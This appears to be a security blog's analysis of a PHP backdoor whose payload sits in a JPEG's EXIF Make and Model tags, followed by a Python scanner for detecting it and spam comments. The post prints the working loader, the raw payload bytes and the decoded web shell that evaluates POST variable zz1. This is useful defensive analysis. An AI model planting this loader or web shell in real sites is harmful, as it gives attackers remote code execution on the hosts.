Checkout the malware in a JPEG

A few days ago, Peter Gramantik from our research team found a very interesting backdoor on a compromised site. This backdoor didn’t rely on the usual tricks for hiding its content inside the PHP file (base64/gzip-encoded blobs); instead it stored its payload in the EXIF headers of a JPEG image. A tiny loader then used the exif_read_data and preg_replace PHP functions to read those headers and execute what they contained.

Technical Details

The backdoor is divided into two parts. The first part is a two-line PHP loader: exif_read_data reads the image headers, and preg_replace executes their content. This is the loader we found on the compromised site:

// Part one: the loader. Read the EXIF headers of an image that ships with the site...
$exif = exif_read_data('/homepages/clientsitepath/images/stories/food/bun.jpg');
// ...then use the Make tag as the pattern and the Model tag as the replacement,
// run against an empty subject string.
preg_replace($exif['Make'],$exif['Model'],'');


Both functions are harmless by themselves: exif_read_data is commonly used to read image metadata, and preg_replace to search and replace inside strings. However, preg_replace has a hidden and tricky option: if the pattern carries the “/e” modifier (PREG_REPLACE_EVAL), the replacement string is not inserted as text but evaluated as PHP code after the substitution, which makes the call an eval() in disguise. Here the attacker controls both the pattern and the replacement, because both come straight out of the image. Note that this modifier was deprecated in PHP 5.5 and removed in PHP 7.0, where the same call only emits an “Unknown modifier 'e'” warning and returns NULL, so this particular loader only fires on PHP 5.x.

When we look at the bun.jpg file, we find the second part of the backdoor:

ÿØÿà^@^PJFIF^@^A^B^@^@d^@d^@^@ÿá^@¡Exif^@^@II*^@
^H^@^@^@^B^@^O^A^B^@^F^@^@^@&^@^@^@^P^A^B^@m^@^@^@,^@^@^@^@^@^@^@/.*/e^
@ eval ( base64_decode("aWYgKGlzc2V0KCRfUE9TVFsienoxIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30="));
@ÿì^@^QDucky^@^A^@^D^@^@^@<^@^@ÿî^@^NAdobe^

The file starts normally with the common headers, but the “Make” tag holds a strange value: “/.*/e”. That is a complete PCRE pattern as preg_replace expects it: “/” delimiters, “.*” to match anything (including the empty subject string the loader passes), and the “e” modifier that makes preg_replace execute (eval) the replacement.

Now things are getting interesting…

If we keep looking at the EXIF data, we can see the “eval ( base64_decode” hidden inside the “Model” tag. When we put it all together, we can see what is going on. The attackers read both the Make and Model tags from the EXIF data and pass them to preg_replace as the pattern and the replacement. Once we substitute the values from the file for $exif['Make'] and $exif['Model'], we get the final backdoor:

preg_replace("/.*/e", '@ eval ( base64_decode("aWYgKGl ..."));', '');

Once decoded, we can see that it just executes whatever PHP code is sent in the POST variable zz1 (stripslashes is there so the code still runs when magic_quotes_gpc has escaped its quotes). The full decoded backdoor, i.e. what the base64 string in the Model tag decodes to, is here:

if (isset($_POST["zz1"])) { eval(stripslashes($_POST["zz1"])); }

Steganography Malware

Another interesting point is that bun.jpg and the other compromised images still load and display properly: EXIF tags are metadata that image decoders ignore, so nothing about the picture changes. In fact, on these compromised sites the attackers modified a legitimate, pre-existing image from the site rather than uploading a new one. Strictly speaking this is hiding data in metadata rather than steganography in the pixel data, but the effect is the same: the file passes as a valid image and will not be caught by checks that only validate images or look for PHP files. The image is also inert without its loader, so a cleanup has to find both halves: PHP code that feeds exif_read_data output into preg_replace, and images whose Make or Model tags contain regex delimiters, the e modifier, eval or base64.
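As an added example (not the post’s own code), the following standard-library Python scanner covers both halves of the technique described above: it parses a JPEG’s APP1/Exif segment, pulls Make and Model out of IFD0 (the same values exif_read_data returns as $exif['Make'] and $exif['Model']), and flags the loader’s fingerprints, i.e. a delimited PCRE pattern carrying the e modifier, PHP code markers, and base64 runs that decode to PHP. It builds its own fixture, a constructed JPEG shell with the post’s Make/Model values, so it runs offline; the base64 string is regenerated from its decoded form. The tag numbers 0x010F (Make) and 0x0110 (Model) come from the TIFF/EXIF specification; the heuristics, thresholds and function names are assumptions of this example.

```python
"""Scan a JPEG's EXIF IFD0 for the Make/Model loader described in the post.

Added example, not the original post's code. Standard library only: a small
JPEG/TIFF walker stands in for exif_read_data, so it runs without PHP or Pillow.
"""
import base64
import re
import struct

TAG_MAKE, TAG_MODEL = 0x010F, 0x0110   # IFD0 tag numbers for Make and Model
TYPE_ASCII = 2                         # TIFF field type: NUL-terminated ASCII

# What the base64 blob in the post decodes to; encoding it reproduces the blob.
PAYLOAD = 'if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"]));}'
PAGE_B64 = base64.b64encode(PAYLOAD.encode()).decode()
MALICIOUS_MAKE = "/.*/e"
MALICIOUS_MODEL = '@ eval ( base64_decode("%s"));' % PAGE_B64

# Heuristics (assumptions of this example): a delimited PCRE pattern whose
# flags include "e", PHP code markers, and long base64 runs that decode to PHP.
PCRE_DELIMITED = re.compile(r"^\s*([^\w\s\\])(.*)\1([A-Za-z]*)\s*$")
CODE_MARKERS = ("eval", "base64_decode", "assert(", "system(", "$_POST", "$_GET", "$_REQUEST")
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def build_exif_jpeg(make, model, order="<"):
    """Constructed fixture: SOI, one APP1/Exif segment with Make and Model in IFD0, EOI.
    No scan data, so it is a JPEG shell for testing, not a viewable picture.
    order is "<" for little-endian ("II", as in the post) or ">" for big-endian ("MM")."""
    values = [(TAG_MAKE, make.encode("latin-1") + b"\x00"),
              (TAG_MODEL, model.encode("latin-1") + b"\x00")]
    ifd_len = 2 + 12 * len(values) + 4         # entry count + entries + next-IFD pointer
    data_off = 8 + ifd_len                     # out-of-line values follow IFD0
    entries, blob = b"", b""
    for tag, val in values:
        if len(val) <= 4:                      # values of 4 bytes or less are stored inline
            entries += struct.pack(order + "HHI", tag, TYPE_ASCII, len(val)) + val.ljust(4, b"\x00")
        else:                                  # longer values sit at an offset from the TIFF header
            entries += struct.pack(order + "HHII", tag, TYPE_ASCII, len(val), data_off + len(blob))
            blob += val
    tiff = ((b"II" if order == "<" else b"MM") + struct.pack(order + "HI", 42, 8)
            + struct.pack(order + "H", len(values)) + entries + struct.pack(order + "I", 0) + blob)
    app1 = b"Exif\x00\x00" + tiff
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"


def exif_ascii_tags(jpeg):
    """Walk the marker segments and return {tag: str} for IFD0's ASCII entries."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI)")
    pos = 2
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF:
        marker = jpeg[pos + 1]
        if marker in (0xD9, 0xDA):             # EOI or SOS: no metadata segments follow
            break
        (seg_len,) = struct.unpack(">H", jpeg[pos + 2:pos + 4])
        seg = jpeg[pos + 4:pos + 2 + seg_len]
        if marker == 0xE1 and seg.startswith(b"Exif\x00\x00"):
            return _ifd0_ascii(seg[6:])
        pos += 2 + seg_len
    return {}


def _ifd0_ascii(tiff):
    """Parse the TIFF header and IFD0; handles both byte orders and inline/offset values."""
    order = {b"II": "<", b"MM": ">"}.get(tiff[:2])
    if order is None:
        raise ValueError("bad TIFF byte-order mark")
    magic, ifd0 = struct.unpack(order + "HI", tiff[2:8])
    if magic != 42:
        raise ValueError("bad TIFF magic")
    (count,) = struct.unpack(order + "H", tiff[ifd0:ifd0 + 2])
    tags = {}
    for i in range(count):
        entry = tiff[ifd0 + 2 + 12 * i:ifd0 + 14 + 12 * i]
        tag, ftype, n = struct.unpack(order + "HHI", entry[:8])
        if ftype != TYPE_ASCII:
            continue
        if n <= 4:
            raw = entry[8:8 + n]
        else:
            (off,) = struct.unpack(order + "I", entry[8:12])
            raw = tiff[off:off + n]
        tags[tag] = raw.split(b"\x00", 1)[0].decode("latin-1")
    return tags


def inspect_make_model(tags):
    """Apply the loader heuristics to Make and Model; an empty list means clean."""
    findings = []
    make, model = tags.get(TAG_MAKE, ""), tags.get(TAG_MODEL, "")
    m = PCRE_DELIMITED.match(make)
    if m and "e" in m.group(3):
        findings.append("Make is a delimited PCRE pattern with the /e modifier: %r" % make)
    for name, value in (("Make", make), ("Model", model)):
        hits = [w for w in CODE_MARKERS if w in value]
        if hits:
            findings.append("%s contains PHP code markers %s" % (name, hits))
        for run in B64_RUN.findall(value):
            try:
                decoded = base64.b64decode(run, validate=True).decode("latin-1")
            except ValueError:                 # binascii.Error is a ValueError subclass
                continue
            inner = [w for w in CODE_MARKERS if w in decoded]
            if inner:
                findings.append("%s carries base64 that decodes to PHP %s: %r" % (name, inner, decoded))
    return findings


def scan_jpeg(jpeg):
    """Full pipeline for one file's bytes: parse EXIF, then inspect Make and Model."""
    return inspect_make_model(exif_ascii_tags(jpeg))
```

To sweep a web root, read each image’s bytes, call scan_jpeg on them and report any file that returns findings; pair that with a search of the PHP files for exif_read_data output being passed to preg_replace, because the image on its own does nothing without the loader.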

11 thoughts on “Checkout the malware in a JPEG”

  1. Thanks for sharing your info. I really appreciate your efforts and I will be waiting for your next write ups thanks once again.

  2. Just wish to say your article is amazing. The clarity on your
    put up is simply excellent and I can think you’re knowledgeable
    in this subject. Fine with your permission let me
    grasp your RSS feed to stay updated with approaching posts.
    Thanks 1,000,000 and please carry on the gratifying
    work.

  3. It’s the best time to make a few plans for the longer term and it is time to be happy.
    I’ve read this post and if I could I desire to recommend you few fascinating things or advice.
    Perhaps you could write subsequent articles relating to this article.
    I desire to read more things approximately it!

  4. I do not even understand how I ended up here, however I
    thought this put up used to be great. I don’t realize
    who you’re but certainly you’re going to a famous blogger if you aren’t already.
    Cheers!

  5. I am really impressed together with your writing skills and
    also with the layout for your blog. Is that this a paid theme or did you modify it yourself?

    Anyway stay up the excellent high quality writing,
    it’s uncommon to see a nice weblog like this one these days..

  6. What’s up to every one, the contents present at this site are really amazing for
    people knowledge, well, keep up the good work fellows.

  7. My family all the time say that I am wasting my time here at net, except I know I am getting
    knowledge every day by reading these nice articles or reviews.

  8. Every weekend I used to go to see this website, as I want enjoyment, since
    this web page contains really nice funny data too.

  9. My brother recommended I might like this website.
    He was entirely right. This post truly made my day.
    You can’t imagine simply how much time I had spent for
    this info! Thanks!

  10. Hey There. I found your blog using msn. This is an extremely well written article.

    I’ll make sure to bookmark it and come back to read more of your useful info.
    Thanks for the post. I’ll definitely return.
